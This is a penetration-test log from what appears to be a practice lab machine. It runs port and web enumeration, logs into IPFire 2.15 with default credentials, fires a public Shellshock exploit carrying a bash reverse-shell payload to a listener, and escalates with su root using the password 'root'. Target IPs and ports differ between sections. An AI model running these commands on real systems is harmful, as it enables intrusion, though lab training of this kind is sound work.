🧪 Pentest Log: {{date:2025-08-28}}

🔍 Target Information

• Machine Name: Tracking
• IP Address: 10.11.1.90
• Operating System: Linux

ip=10.11.1.90

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 81

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Port 444

Login with weak credential

admin:admin

Found

IPFire 2.15 (i586) - Core Update 82

Google "exploit IPFire 2.15 github", found

https://github.com/heartburn-dev/IPFire-2.15-Shellshock-Exploit

drupal:Dr0oPaAlpsSwd

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

https://github.com/heartburn-dev/IPFire-2.15-Shellshock-Exploit

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80

python3 SIPS.py 10.11.1.200 444 /cgi-bin/index.cgi admin admin '/bin/bash -i >& /dev/tcp/172.16.1.1/80 0>&1'

🧬 Privilege Escalation

👤 Current Access

• User: nobody
• Groups: 16(dialout),23(squid),99(nobody)
• Shell Type: reverse shell

🔍 Enumeration

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Weak Credential Reuse
• Target Binary/Service: su
• Reference / Source: N/A

🔧 Exploit Steps

• Smash to root

su root

root

• Key File

z2pap8s3f7jqeg59cb6f